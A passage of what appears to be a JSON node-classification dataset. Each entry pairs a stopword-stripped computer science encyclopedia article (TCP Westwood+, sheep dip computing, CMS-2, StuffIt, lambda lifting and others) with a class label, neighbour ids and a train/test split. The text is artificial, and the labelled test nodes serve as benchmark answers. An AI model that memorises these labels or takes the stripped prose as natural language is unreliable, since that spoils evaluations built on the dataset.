method base class overriding method derived class generally needs call codice_2 method base class order properly release resources held base secondly object relationship another object holds resource i.e. object indirectly uses resource another object directly uses resource indirectly using object disposable corresponds whether relationship owning object composition viewing object aggregation even communicating association conventions found indirect user responsible resource responsible indirect use responsible resource must disposable dispose owned objects disposed analogous destroying finalizing owned objects composition owning provides encapsulation object used needs tracked cost considerable complexity relationships objects aggregation viewing considerably simpler cost lacking encapsulation .net convention direct user resources responsible implement idisposable type uses unmanaged resources directly see resource management details examples",
    "neighbors": [
      9762,
      8554,
      4747,
      5677,
      10670,
      7983,
      8975,
      9490,
      3871,
      3413,
      10684,
      6813,
      6527
    ],
    "mask": "Test"
  },
  {
    "node_id": 717,
    "label": 0,
    "text": "ISO_12620:iso 12620 iso 12620 standard iso/tc 37 defines data category registry registry registering linguistic terms used various fields translation computational linguistics natural language processing defining mappings different terms terms used different systems goal registry new systems reuse existing terminology least easily mapped existing terminology aid interoperability end number terminologies added registry including ones based general ontology linguistic description national corpus polish termbase exchange localization industry standards association standard first released iso 12620:1999 rendered obsolete iso 12620:2009 first edition english-only second bilingual english-french standard relatively low-level used standards lexical markup framework iso 24613:2008",
    "neighbors": [
      1890,
      2948,
      7780,
      11056,
      2100,
      7164,
      6655
    ],
    "mask": "Validation"
  },
  {
    "node_id": 718,
    "label": 5,
    "text": "TCP_Westwood_plus:tcp westwood plus tcp westwood+ sender-side modification tcp reno protocol stack optimizes performance tcp congestion control wireline wireless networks tcp westwood+ based end-to-end bandwidth estimation set congestion window slow start threshold congestion episode three duplicate acknowledgments timeout bandwidth estimated properly low-pass filtering rate returning acknowledgment packets rationale strategy simple contrast tcp reno blindly halves congestion window three duplicate acks tcp westwood+ adaptively sets slow start threshold congestion window takes account bandwidth used time congestion experienced tcp westwood+ significantly increases throughput wireless links fairness compared tcp reno/new reno wired networks tcp westwood+ evolution tcp westwood main idea westwood tcp end-to-end bandwidth estimation setting control windows congestion proposed saverio mascolo came idea reading chapter tcp congestion control book data networks larry peterson first implementation tcp westwood ns2 done university california los angeles ucla 1999 name westwood chosen s. mascolo due homage home ucla visiting researcher time main collaborators prof. mario gerla dr. claudio casetti dr. medy senadidi saverio mascolo went back italy evolution westwood tcp named westwood+ main novelty westwood+ algorithm used estimate available bandwidth end-to-end fact soon discovered westwood bandwidth estimation algorithm work well presence reverse traffic due ack compression phenomenon explained terms aliasing effects new version westwood+ implemented first time kernel linux 2.2 roberto ferorelli kernel linux 2.4 2.6 angelo dell'aera working politecnico di bari undergraduate students 2003 2004 main references saverio mascolo claudio casetti mario gerla m. y. sanadidi ren wang tcp westwood bandwidth estimation enhanced transport wireless links proc acm mobicom 2001 rome italy july 16-21 2001 l. a. grieco s. mascolo performance evaluation comparison westwood+ new reno vegas tcp congestion control acm computer communication review april 2004 vol 34 2 s. mascolo g. racanelli testing tcp westwood+ transatlantic links 10 gigabit/second rate third international workshop protocols fast long-distance networks pfldnet05 ecole normale supérieure lyon france february 3,4 2005",
    "neighbors": [
      7017,
      10147,
      10924,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 719,
    "label": 4,
    "text": "Sheep_dip_(computing):sheep dip computing data security sheep dip process using dedicated computer test files removable media viruses allowed used computers protocol normal first line defence viruses high-security computing environments security specialists expected familiar concept process originally developed response problem boot sector viruses floppy discs subsequently scope expanded include usb flash drives portable hard discs memory cards cd-roms removable devices potentially carry malware name sheep dip derived method preventing spread parasites flock sheep dipping animals one another trough pesticide term use since least early 1990s though footbath also used time sheep dip system considered special case sandbox used test malware sheep dip normally stand-alone computer connected network antivirus software order scan removable media protect sheep dip computer system made effective one antivirus program single antivirus product able detect types virus important secure sheep dip computers strongly possible malware role first line defence means particularly likely attacked software updates applied soon become available antivirus signatures up-to-date available practice means must updated least daily operating system hardened locked far possible network connections avoided two reasons firstly internet connection potential attack vector via computer could compromised secondly risk worm removable device might escape local area network sheep dip computer connected isolation networks makes automatic updating impossible sheep dip computer able make contact servers software updates antivirus signatures distributed therefore normal updates applied manually downloaded separate network-connected computer copied usb flash drive computer security antivirus updates dependent manual intervention human beings system security becomes vulnerable human error pressure work prevents updates applied soon become available sheep dip computer gradually become insecure absence network connections also makes difficult organisation monitor status sheep dips deployed several different locations people central responsibility security must rely prompt accurate reports use sheep dips risk human error active sheep dip antivirus protection monitored real time another program order increase security antivirus effective up-to-date properly configured running active sheep dips add extra layer security checking antivirus intervening necessary least active sheep dip must disable access removable media detects antivirus signatures up-to-date advanced system allowed limited network access automatic updates remote monitoring must enable network connection immediate malware risk network connection active removable media access must disabled",
    "neighbors": [
      2432,
      2213,
      4972,
      7515,
      11188,
      7739
    ],
    "mask": "Test"
  },
  {
    "node_id": 720,
    "label": 3,
    "text": "Intel_8279:intel 8279 intel 8279 keyboard/display controller specially developed interfacing keyboard display devices intel 8085 8086 8088 microprocessors important features keyboard section display section scan section cpu interface section interfacing 8279 8085 microprocessor based system keyboard 7-segment led display interfaced using ports latches processor carry following task operating modes 8279 1 input modes basic input modes 1 scanned keyboard 2 scanned sensor matrix 3 strobed input 2 display modes two basic output modes 1 left entry typewriter type 2 right entry calculator type full datasheet link http //www.futurlec.com/datasheet/80series/8279.pdf",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 721,
    "label": 9,
    "text": "CMS-2_(programming_language):cms-2 programming language cms-2 embedded systems programming language used united states navy early attempt develop standardized high-level computer programming language intended improve code portability reusability cms-2 developed primarily us navy ’ tactical data systems ntds cms-2 developed rand corporation early 1970s stands compiler monitor system name cms-2 followed literature letter designating type target system example cms-2m targets navy 16-bit processors an/ayk-14 cms-2 developed fcpcpac fleet computer programming center pacific san diego ca implemented computer sciences corporation 1968 design assistance intermetrics language continued developed eventually supporting number computers including an/uyk-7 an/uyk-43 uyk-20 uyk-44 computers cms-2 designed encourage program modularization permitting independent compilation portions total system language statement oriented source free-form may arranged programming convenience data types include fixed-point floating-point boolean character status direct reference manipulation character bit strings permitted symbolic machine code may included known direct code cms-2 program composed statements statements made symbols separated delimiters categories symbols include operators identifiers constants operators language primitives assigned compiler specific operations definitions program identifiers unique names assigned programmer data units program elements statement labels constants known values may numeric hollerith strings status values boolean cms-2 statements free form terminated dollar sign statement label may placed beginning statement reference purposes cms-2 source program composed two basic types statement declarative statements provide basic control information compiler define structure data associated particular program dynamic statements cause compiler generate executable machine instructions object code declarative statements defining data program grouped units called data designs data designs consist precise definitions temporary permanent data storage areas input areas output areas special data units dynamic statements act data perform calculations grouped procedures data designs procedures grouped form system elements cms-2 program compiler combines system elements compile time system compile time system may stand alone part larger program data declarative statements provide compiler information data element definitions define format structure order data elements compile-time system three major kinds data switches variables aggregates switches provide transfer program control specific location compile-time system contain set identifiers switch points facilitate program transfers branches switch represents program address statement label procedure name variable single piece data may consist one bit multiple bits words value may assigned variable definition variables may hold constant changing value data types include integers fix point floating point hollerith character strings status booleans tables hold ordered sets identically structured information common unit data table item items may subdivided fields smallest subdivision table allowable data types contained fields include integer fixed point floating point hollerith character string status boolean array extension table concept basic structural unit array item array items contain fields defined programmer dynamic statements specify processing operations result executable code generation compiler dynamic statement consists operator followed list operands additional operators operand may single name constant data-element reference expression major cms-2 operators summarized special operators facilitate references data structures operations dynamic statements describe processing operations program grouped blocks statements called procedures input/output statements provide communication hardware devices running non-realtime environment monitor system compiler monitor system 2 cms-2 system ran univac cp-642b an/usq-20 system software included monitor compiler librarian cp-642 loader tape utility flow charter batch processing operating system controls execution cms-2 components user jobs run cp-642 computer provides input/output software library facilities debugging tools job accounting also provided compiler cs-1 cms-2 languages generates object code cp-642 l-304 an/uyk-7 1830a 1218/1219 computers 1970s different versions cms-2 compiler depending computer used compile code source code rewritten work around functions different versions cms-2 problems debugging tools extended cms-2 compiler adding language features an/uyk-7 computer generates an/uyk-7 object code file management system provides storage access source object code two object code loaders loading absolute relocatable object code set utilities managing data magnetic tape flowcharter software processes flowcharter statements cms-2 source code outputs flowchart high-speed printer",
    "neighbors": [
      9345,
      8262,
      10089,
      1611,
      428,
      5428,
      8502,
      3960
    ],
    "mask": "None"
  },
  {
    "node_id": 722,
    "label": 6,
    "text": "StuffIt:stuffit stuffit family computer software utilities archiving compressing files originally produced macintosh versions microsoft windows linux x86 sun solaris later created proprietary compression format used stuffit utilities also termed stuffit stuffit originally developed summer 1987 raymond lau student stuyvesant high school new york city combined fork-combining capabilities utilities macbinary newer compression algorithms similar used zip compared existing utilities mac notably packit stuffit offered one step operation higher compression ratios fall 1987 stuffit largely replaced packit mac world many software sites even going far convert existing packit archives save space stuffit soon became popular aladdin systems formed market last shareware release lau version 1.5.1 split product line two offering stuffit classic shareware stuffit deluxe commercial package deluxe added variety additional functions including additional compression methods integration mac finder allow files compressed magic menu without opening stuffit stuffit upgraded several times lau removed direct development major upgrades internal machinery rare new features techniques appeared regularly macintosh platform shareware utility compact pro emerged competitor stuffit early 1990s major competitive upgrade followed accompanied release freeware stuffit expander make format universally readable well shareware stuffit lite made easier produce prior anyone attempting use format needed buy stuffit making compact pro attractive move success compact pro subsequently fell use several mac compression utilities appeared disappeared 1990s none became real threat stuffit dominance ones see widespread use special-purpose disk expanders like diskdoubler superdisk served different niche apparently side-effect stuffit saw upgrades file format changed number major revisions leading incompatible updates pc-based formats long surpassed stuffit terms compression notably newer systems like rar 7z little impact mac market never appeared easy-to-use program mac introduction mac os x newer mac software lost forks longer needed anything except built-in unix utilities like gzip tar numerous programs wrapping utilities distributed since files could opened machine considerably practical stuffit era data cross-platform release os x public beta aladdin systems released stuffit 6.0 runs os x expander longer relying stuffit engine™ although late market aladdin systems introduced completely new stuffit x format september 2002 stuffit deluxe 7.0 macintosh designed extendable support compression methods support long file names support unix windows file attributes stuffit x improves original stuffit format descendants adding multiple compression algorithms ppm bwt lzw-type compression also added block mode option several encryption options january 2005 jpeg compression added stuffit x compression option see related 'sif format mid-1990s 2005 acquisition smith micro software coinciding release mac os x v10.4 tiger stuffit expander came bundled macintosh operating system although mac files generally use filename extensions one stuffit primary uses allow mac files stored non-mac systems extensions required stuffit-compressed files save resource forks macintosh files inside typically extension .sit newer non-backwards compatible stuffit x-compressed files carry file extension .sitx encrypted stuffit archives created now-discontinued private file utility .pf extensions stuffit-compressed shrinkwrap disk images carry .img .image extensions however classic mac os version stuffit needed mount images convert newer format readable macos smith micro software offers free downloads stuffit expander mac windows expands uncompresses files compressed using stuffit stuffit x format well many compressed encoded encrypted segmented formats shareware application dropstuff permits compressing files stuffit x format stuffit stuffit x formats remain unlike file compression formats proprietary smith micro software charge license fees use programs given alternative programs support format also self-expanding variant stuffit files .sea extension runs executable utility called unsea exists turn executable vanilla sit file early 2005 new jpeg compression system released regularly obtained compression order 25 meaning compressed file size 75 original file size without loss image quality ability rebuild original file original image zip-like programs typically achieve jpeg compression rates order 1 3 programs optimise jpegs without regard original file original image obtain compression rates 3 10 depending efficiency original jpeg programs use rarely implemented arithmetic coding option available jpeg standard typically achieve rates around 12 new technique implemented stuffit x format option stuffit deluxe product also proposed new image format known sif simply consists single jpeg file compressed using new technique pending filing patent retain knowledge details algorithm trade secret duplicate folding™ feature saves even space keeping one copy duplicate file archive changes stuffit compression software claimed developer upgrades frequently render previous versions stuffit unable decompress newer archives without first downloading purchasing new version incompatibility inconvenient work flows timely execution importance though users able create archives legacy format functionality clearly exposed july 5 2005 smith micro software announced acquisition intention expand new jpeg recompression technique wireless platforms file formats initial press release preliminary information saw first use title “ stuffit wireless. ” macos includes archive utility compatible open formats zip gzip bzip2 versions since 10.3 panther preserves resource forks zip format stuffit longer requirement mac file compression zip also de facto standard making widely accepted archives sharing stuffit used standard way packaging mac software download macos native compressed disk images dmg largely replaced practice stuffit might still used situations specific features required archive editing/browsing better compression jpeg compression encryption old packages open source alternative might unarchiver even n't support newer stuffit file formats 3rd-party software macintosh finder replacement path finder use stuffit sdk gain features stuffit",
    "neighbors": [
      2432,
      9988,
      6022,
      10121,
      1420,
      6797,
      1940,
      3222,
      9880,
      3114,
      10027,
      9388,
      2095,
      7983,
      4406,
      823,
      6713,
      576,
      10817,
      2755,
      11076,
      1352,
      4296,
      3659,
      10317,
      4174,
      10575,
      3921,
      4561,
      2389,
      4309,
      3804,
      7422,
      1631,
      3296,
      9953,
      5858,
      11614,
      6759,
      5096,
      7529,
      10857,
      4459,
      8940,
      237,
      1646,
      4845,
      499,
      5492,
      6389,
      7667,
      4089,
      6908,
      894,
      10623
    ],
    "mask": "Test"
  },
  {
    "node_id": 723,
    "label": 7,
    "text": "Physicalization:physicalization physicalization opposite virtualization way place multiple physical machines rack unit way reduce hardware costs since cases server processors cost per core energy efficient laptop processors may make added cost board level integration moore law makes increasing integration less expensive jobs require lots i/o bandwidth may less expensive provide using many fewer integrated processors applications services i/o bound likely benefit physicalized environments ensures operating system instance running processor network interface card host bus i/o sub-system unlike case multi-core servers single i/o sub-system shared cores vms data physicalization simply physicalization physical artefact whose geometry material properties encode data main goals engage people communicate data using computer-supported physical data representations",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 724,
    "label": 4,
    "text": "List_of_Kiosk_software:list kiosk software list kiosk software list includes kiosk-exclusive software well mobile device management software kiosk features",
    "neighbors": [
      8615,
      6153,
      3949,
      5371,
      6834,
      823,
      2328,
      1849,
      5210,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 725,
    "label": 3,
    "text": "Transmeta_Efficeon:transmeta efficeon efficeon processor transmeta second-generation 256-bit vliw design released 2004 employs software engine code morphing software aka cms convert code written x86 processors native instruction set chip like predecessor transmeta crusoe 128-bit vliw architecture efficeon stresses computational efficiency low power consumption low thermal footprint efficeon closely mirrors feature set intel pentium 4 processors although like amd opteron processors supports fully integrated memory controller hypertransport io bus nx bit no-execute x86 extension pae mode nx bit support available starting cms version 6.0.4 efficeon computational performance relative mobile cpus like intel pentium thought lower although little appears published relative performance competing processors efficeon came two package types 783- 592-contact ball grid array power consumption moderate consuming little 3 watts 1 ghz 7 watts 1.5 ghz passively cooled two generations chip produced first generation tm8600 manufactured using tsmc 0.13 micrometre process produced speeds 1.2 ghz second generation tm8800 tm8820 manufactured using fujitsu 90 nm process produced speeds ranging 1 ghz 1.7 ghz internally efficeon two arithmetic logic units two load/store/add units two execute units two floating-point/mmx/sse/sse2 units one branch prediction unit one alias unit one control unit vliw core execute 256-bit vliw instruction per cycle called molecule room store eight 32-bit instructions called atoms per cycle efficeon 128 kb l1 instruction cache 64 kb l1 data cache 1 mb l2 cache caches die additionally efficeon cms code morphing software reserves small portion main memory typically 32 mb translation cache dynamically translated x86 instructions",
    "neighbors": [
      6818,
      8231,
      1005,
      5134,
      977,
      4465,
      499,
      5844,
      9137,
      630,
      1820,
      8125,
      8126,
      3071
    ],
    "mask": "Validation"
  },
  {
    "node_id": 726,
    "label": 9,
    "text": "Susan_L._Graham:susan l. graham susan lois graham born september 16 1942 american computer scientist graham pehong chen distinguished professor computer science division department electrical engineering computer sciences university california berkeley born cleveland graham received a.b mathematics harvard 1964 graduate work computer science stanford receiving m.s 1966 ph.d. 1971 supervision david gries 1971 joined faculty university california berkeley rising assistant professor 1971–1976 associate professor 1976–1981 full professor 1981 onwards graham research projects include graham published dozens research articles lectured published extensively subjects computer languages compilers programming environments member united states president council advisors science technology among activities chaired panel open source software high end computing graham long involved harvard culminating joining harvard corporation 2011 1994 inducted fellow association computing machinery also fellow american association advancement science american academy arts sciences ieee member national academy engineering 2004 paper gprof appeared list 50 influential pldi papers time one four papers 1982 year 2009 awarded ieee john von neumann medal contributions programming language design implementation exemplary service discipline computer science sept. 29 2011 announced chosen receive acm-ieee-cs ken kennedy award november 15 2011 seattle sc11 international conference high-performance computing graham featured notable women computing cards",
    "neighbors": [
      8395,
      11317,
      1783,
      1180,
      7775
    ],
    "mask": "None"
  },
  {
    "node_id": 727,
    "label": 9,
    "text": "Lambda_lifting:lambda lifting lambda lifting meta-process restructures computer program functions defined independently global scope individual lift transforms local function global function two step process consisting term lambda lifting first introduced thomas johnsson around 1982 historically considered mechanism implementing functional programming languages used conjunction techniques modern compilers lambda lifting closure conversion requires call sites adjusted adding extra arguments calls introduce closure lifted lambda expression contrast closure conversion require call sites adjusted introduce closure lambda expression mapping free variables values technique may used individual functions code refactoring make function usable outside scope written lambda lifts may also repeated order transform program repeated lifts may used convert program written lambda calculus set recursive functions without lambdas demonstrates equivalence programs written lambda calculus programs written functions however demonstrate soundness lambda calculus deduction eta reduction used lambda lifting step introduces cardinality problems lambda calculus removes value variable without first checking one value satisfies conditions variable see curry paradox lambda lifting expensive processing time compiler efficient implementation lambda lifting formula_1 processing time compiler untyped lambda calculus basic types functions lifting may change result beta reduction lambda expression resulting functions meaning mathematical sense regarded function untyped lambda calculus see also intensional versus extensional equality reverse operation lambda lifting lambda dropping lambda dropping may make compilation programs quicker compiler may also increase efficiency resulting program reducing number parameters reducing size stack frames however makes function harder re-use dropped function tied context used different context first lifted following algorithm one way lambda-lift arbitrary program language n't support closures first-class objects language closures first-class objects passed arguments returned functions closure need represented data structure captures bindings free variables following ocaml program computes sum integers 1 100 codice_1 declares codice_2 function may call function f adds sum argument sum numbers less argument local function within definition f n free variable start converting free variable parameter next lift f global function following example time written javascript lambda lifting closure methods implementing block structured programs implements block structure eliminating functions lifted global level closure conversion provides closure links current frame frames closure conversion takes less compile time recursive functions block structured programs without lifting may implemented using stack based implementation simple efficient however stack frame based implementation must strict eager stack frame based implementation requires life functions last-in first-out lifo recent function start calculation must first end functional languages haskell implemented using lazy evaluation delays calculation value needed lazy implementation strategy gives flexibility programmer lazy evaluation requires delaying call function request made value calculated function one implementation record reference frame data describing calculation place value later value required frame used calculate value time needed calculated value replaces reference frame similar stack frame difference stored stack lazy evaluation requires data required calculation saved frame function lifted frame needs record function pointer parameters function modern languages use garbage collection place stack based allocation manage life variables managed garbage collected environment closure records references frames values may obtained contrast lifted function parameters value needed calculation let expression useful describing lifting dropping describing relationship recursive equations lambda expressions functional languages let expressions also block structured programming languages like algol pascal similar allow local definition function use restricted scope let expression used fully mutually recursive version let rec implemented many functional languages let expressions related lambda calculus lambda calculus simple syntax semantics good describing lambda lifting convenient describe lambda lifting translations lambda let expression lambda dropping reverse let expressions allow mutual recursion sense lifted supported lambda calculus lambda calculus support mutual recursion one function may defined outermost global scope conversion rules describe translation without lifting given let expression article following rules describe equivalence lambda let expressions meta-functions given describe lambda lifting dropping meta-function function takes program parameter program data meta-program program meta program different meta-levels following conventions used distinguish program meta program simplicity first rule given matches applied rules also assume lambda expressions pre-processed lambda abstraction unique name substitution operator used extensively expression formula_5 means substitute every occurrence g l return expression definition used extended cover substitution expressions definition given lambda calculus page matching expressions compare expressions alpha equivalence renaming variables lambda lift takes lambda abstraction sub expression lambda expression replaces function call application function creates free variables sub expression parameters function call lambda lifts may used individual functions code refactoring make function usable outside scope written lifts may also repeated expression lambda abstractions order transform program lift given sub-expression within expression lift top expression expression may part larger program allows control sub-expression lifted lambda lift operation used perform lift within program sub expression may either lambda abstraction lambda abstraction applied parameter two types lift possible anonymous lift lift expression lambda abstraction regarded defining anonymous function name must created function named lift expression lambda abstraction applied expression lift regarded named definition function anonymous lift takes lambda abstraction called lambda lift substitution lambda abstraction function application along addition definition function new lambda expression substituted g. note l =g means substitution g l function definitions function definition g added rule g function application substituted expression defined v function name must new variable i.e name already used lambda expression formula_10 meta function returns set variables used e function call g constructed adding parameters variable free variable set represented v function h named lift similar anonymous lift except function name v provided anonymous lift expression g constructed v applying free variables defined lambda lift transformation takes lambda expression lifts lambda abstractions top expression abstractions translated recursive functions eliminates lambda abstractions result functional program form series function definitions n expression representing value returned example de-let meta function may used convert result back lambda calculus processing transforming lambda expression series lifts lift lifts applied lets combined together single let parameter dropping applied remove parameters necessary let expression let expression allows function definitions refer directly whereas lambda abstractions strictly hierarchical function may directly refer two different ways expression may selected lifting first treats lambda abstractions defining anonymous functions second treats lambda abstractions applied parameter defining function lambda abstractions applied parameter dual interpretation either let expression defining function defining anonymous function interpretations valid two predicates needed definitions lambda-free expression containing lambda abstractions lambda-anon anonymous function expression like formula_21 x lambda free search deepest anonymous abstraction lift applied function lifted become simple equation definition recognize lambda abstractions parameter defining function lambda abstractions regarded defining anonymous functions lift-choice first anonymous found traversing expression none function example search deepest named anonymous function definition lift applied function lifted become simple equation definition recognizes lambda abstraction actual parameter defining function lambda abstractions without application treated anonymous functions example example combinator lifted parameter dropping lambda expression see conversion let lambda expressions lifting anonymous functions combinator parameter dropping lambda expression first sub expression chosen lifting formula_42 transforms lambda expression formula_43 creates equation formula_44 second sub expression chosen lifting formula_45 transforms lambda expression formula_46 creates equation formula_47 result surprisingly result simpler one obtained lifting named functions apply function y-combinator calls parameter function repeatedly value defined function fixed point function never terminate lambda dropping making scope functions smaller using context reduced scope reduce number parameters functions reducing number parameters makes functions easier comprehend lambda lifting section meta function first lifting converting resulting lambda expression recursive equation described lambda drop meta function performs reverse first converting recursive equations lambda abstractions dropping resulting lambda expression smallest scope covers references lambda abstraction lambda dropping performed two steps lambda drop applied expression part program dropping controlled set expressions drop excluded lambda drop transformation sinks abstractions expression sinking excluded expressions set expressions sink-tran sinks abstraction starting innermost sinking moving lambda abstraction inwards far possible still outside references variable application 4 cases abstraction use renaming insure variable names distinct variable 2 cases sink test excludes expressions dropping parameter dropping optimizing function position function lambda lifting added parameters necessary function moved context dropping process reversed extra parameters contain variables free may removed dropping parameter removing unnecessary parameter function actual parameter passed always expression free variables expression must also free function defined case parameter dropped replaced expression body function definition makes parameter unnecessary example consider example actual parameter formal parameter always p p free variable whole expression parameter may dropped actual parameter formal parameter always n however n bound lambda abstraction parameter may dropped result dropping parameter main example definition drop-params-tran abstraction defines function build information required make decisions dropping names information describes parameter parameter name expression actual value indication expressions value example parameters function g abstraction renamed unique name parameter list associated name abstraction example g parameter list build-param-lists builds lists expression traversing expression four parameters abstraction lambda expression form formula_70 analyzed extract names parameters function locate name start building parameter list name filling formal parameter names also receive actual parameter list body expression return actual parameter list expression variable call function function name parameter start populating actual parameter list outputting parameter list name application application function call processed extract actual parameter details retrieve parameter lists expression parameter retrieve parameter record parameter list expression check current parameter value matches parameter record value parameter name use later checking logic quite subtle way works value indicator never set true set false values matched value retrieved using build set boolean values allowed true member values parameter equal parameter may dropped similarly def uses set theory query variable given value let let expression use let example building parameter lists gives parameter dropped give another example x equal f. parameter list mapping parameter x dropped give use information obtained build parameter lists drop actual parameters longer required drop-params parameters abstraction variable function name parameter start populating actual parameter list outputting parameter list name application application function call processed extract let let expression use let drop-formal removes formal parameters based contents drop lists parameters drop-formal defined explained starting function definition y-combinator gives back fixed-point combinator|y combinator category implementation functional programming languages category lambda calculus category compiler construction",
    "neighbors": [
      512,
      2304,
      1952,
      8000,
      3876,
      3462,
      6536,
      8524,
      10510,
      5040,
      1523,
      10581,
      2585,
      10618
    ],
    "mask": "None"
  },
  {
    "node_id": 728,
    "label": 6,
    "text": "Tahoe-LAFS:tahoe-lafs tahoe-lafs tahoe least-authority file store free open secure decentralized fault-tolerant distributed data store distributed file system used online backup system serve file web host similar freenet depending front-end used insert access files tahoe system tahoe also used raid-like fashion using multiple disks make single large redundant array inexpensive nodes rain pool reliable data storage system designed implemented around principle least authority pola strict adherence convention enabled use cryptographic capabilities provide minimum set privileges necessary perform given task asking agents rain array acts storage volume servers need trusted confidentiality integrity stored data patched version tahoe-lafs exists 2011 made run anonymous networks i2p support multiple introducers also version microsoft windows distributed site within i2p network contrast normal tahoe-lafs operation i2p tahoe-lafs used together location nodes disguised allows anonymous distributed grids formed",
    "neighbors": [
      5120,
      2050,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      546,
      9762,
      5158,
      3629,
      2609,
      7225,
      10813,
      9281,
      8772,
      10835,
      1109,
      8283,
      4193,
      4194,
      4708,
      9836,
      7789,
      3700,
      5749,
      9332,
      6263,
      9333,
      9335,
      7804,
      9343,
      4746,
      7818,
      8331,
      654,
      2193,
      2194,
      6291,
      2197,
      2199,
      11419,
      6813,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      7884,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      256,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      4390,
      3368,
      4907,
      9004,
      302,
      7983,
      6963,
      1844,
      7480,
      6970,
      11072,
      3909,
      2378,
      11596,
      4431,
      5969,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      8554,
      5483,
      10614,
      6519,
      376,
      11128,
      890,
      11638,
      5503,
      7554,
      2951,
      10631,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      2974,
      3999,
      7070,
      10146,
      6565,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      2487,
      1464,
      8631,
      1978,
      6591,
      8640,
      11201,
      4034,
      8643,
      2015,
      7139,
      1509,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "None"
  },
  {
    "node_id": 729,
    "label": 9,
    "text": "Richard_O'Keefe:richard o'keefe dr. richard a. o'keefe computer scientist best known writing influential book prolog programming craft prolog lecturer researcher department computer science university otago dunedin new zealand concentrates languages logic programming functional programming including prolog haskell erlang",
    "neighbors": [
      3876,
      8421
    ],
    "mask": "Test"
  },
  {
    "node_id": 730,
    "label": 3,
    "text": "Opcode_table:opcode table opcode table also called opcode matrix visual representation opcodes instruction set arranged axis table represents upper lower nibble combined form full byte opcode additional opcode tables exist additional instructions created using opcode prefix structure arrangement opcode table appears follows cell 00-ff contains information equivalent assembly instruction corresponding opcode parameters cpu cycle counts",
    "neighbors": [
      10786,
      8715,
      8716,
      10796,
      5358,
      8143,
      372,
      7421
    ],
    "mask": "Train"
  },
  {
    "node_id": 731,
    "label": 3,
    "text": "Multithreading_(computer_architecture):multithreading computer architecture computer architecture multithreading ability central processing unit cpu single core multi-core processor provide multiple threads execution concurrently supported operating system approach differs multiprocessing multithreaded application threads share resources single multiple cores include computing units cpu caches translation lookaside buffer tlb multiprocessing systems include multiple complete processing units one cores multithreading aims increase utilization single core using thread-level parallelism well instruction-level parallelism two techniques complementary sometimes combined systems multiple multithreading cpus cpus multiple multithreading cores multithreading paradigm become popular efforts exploit instruction-level parallelism stalled since late 1990s allowed concept throughput computing re-emerge specialized field transaction processing even though difficult speed single thread single program computer systems actually multitasking among multiple threads programs thus techniques improve throughput tasks result overall performance gains two major techniques throughput computing multithreading multiprocessing thread gets lot cache misses threads continue taking advantage unused computing resources may lead faster overall execution resources would idle single thread executed also thread use computing resources cpu instructions depend result running another thread may prevent resources becoming idle multiple threads interfere sharing hardware resources caches translation lookaside buffers tlbs result execution times single thread improved degraded even one thread executing due lower frequencies additional pipeline stages necessary accommodate thread-switching hardware overall efficiency varies intel claims 30 improvement hyper-threading technology synthetic program performing loop non-optimized dependent floating-point operations actually gains 100 speed improvement run parallel hand hand-tuned assembly language programs using mmx altivec extensions performing data prefetches good video encoder might suffer cache misses idle computing resources programs therefore benefit hardware multithreading indeed see degraded performance due contention shared resources software standpoint hardware support multithreading visible software requiring changes application programs operating systems multiprocessing hardware techniques used support multithreading often parallel software techniques used computer multitasking thread scheduling also major problem multithreading simplest type multithreading occurs one thread runs blocked event normally would create long-latency stall stall might cache miss access off-chip memory might take hundreds cpu cycles data return instead waiting stall resolve threaded processor would switch execution another thread ready run data previous thread arrived would previous thread placed back list ready-to-run threads example conceptually similar cooperative multi-tasking used real-time operating systems tasks voluntarily give execution time need wait upon type event type multithreading known block cooperative coarse-grained multithreading goal multithreading hardware support allow quick switching blocked thread another thread ready run achieve goal hardware cost replicate program visible registers well processor control registers program counter switching one thread another thread means hardware switches using one register set another switch efficiently active threads active thread needs register set example quickly switch two threads register hardware needs instantiated twice additional hardware support multithreading allows thread switching done one cpu cycle bringing performance improvements also additional hardware allows thread behave executing alone sharing hardware resources threads minimizing amount software changes needed within application operating system support multithreading many families microcontrollers embedded processors multiple register banks allow quick context switching interrupts schemes considered type block multithreading among user program thread interrupt threads purpose interleaved multithreading remove data dependency stalls execution pipeline since one thread relatively independent threads less chance one instruction one pipelining stage needing output older instruction pipeline conceptually similar preemptive multitasking used operating systems analogy would time slice given active thread one cpu cycle example type multithreading first called barrel processing staves barrel represent pipeline stages executing threads interleaved preemptive fine-grained time-sliced multithreading modern terminology addition hardware costs discussed block type multithreading interleaved multithreading additional cost pipeline stage tracking thread id instruction processing also since threads executed concurrently pipeline shared resources caches tlbs need larger avoid thrashing different threads advanced type multithreading applies superscalar processors whereas normal superscalar processor issues multiple instructions single thread every cpu cycle simultaneous multithreading smt superscalar processor issue instructions multiple threads every cpu cycle recognizing single thread limited amount instruction-level parallelism type multithreading tries exploit parallelism available across multiple threads decrease waste associated unused issue slots example distinguish types multithreading smt term temporal multithreading used denote instructions one thread issued time addition hardware costs discussed interleaved multithreading smt additional cost pipeline stage tracking thread id instruction processed shared resources caches tlbs sized large number active threads processed implementations include dec later compaq ev8 completed intel hyper-threading technology ibm power5 sun microsystems ultrasparc t2 cray xmt amd bulldozer zen microarchitectures major area research thread scheduler must quickly choose among list ready-to-run threads execute next well maintain ready-to-run stalled thread lists important subtopic different thread priority schemes used scheduler thread scheduler might implemented totally software totally hardware hardware/software combination another area research type events cause thread switch cache misses inter-thread communication dma completion etc multithreading scheme replicates software-visible state including privileged control registers tlbs enables virtual machines created thread allows thread run operating system processor hand user-mode state saved less hardware required would allow threads active one time die area cost",
    "neighbors": [
      5120,
      7173,
      9224,
      9739,
      2066,
      7699,
      5655,
      5658,
      10779,
      10781,
      6181,
      8231,
      6184,
      3630,
      6705,
      2098,
      7218,
